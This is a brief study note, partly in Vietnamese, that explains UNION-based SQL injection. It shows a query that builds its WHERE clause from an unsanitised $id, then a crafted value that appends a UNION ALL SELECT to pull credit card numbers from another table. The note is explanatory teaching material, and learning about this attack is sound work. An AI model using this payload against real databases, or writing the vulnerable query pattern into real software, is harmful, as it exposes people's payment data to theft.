VD Union
SELECT Name, Phone, Address FROM Users WHERE Id=$id

$id value :
  $id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable
truy van hien ra:
	SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable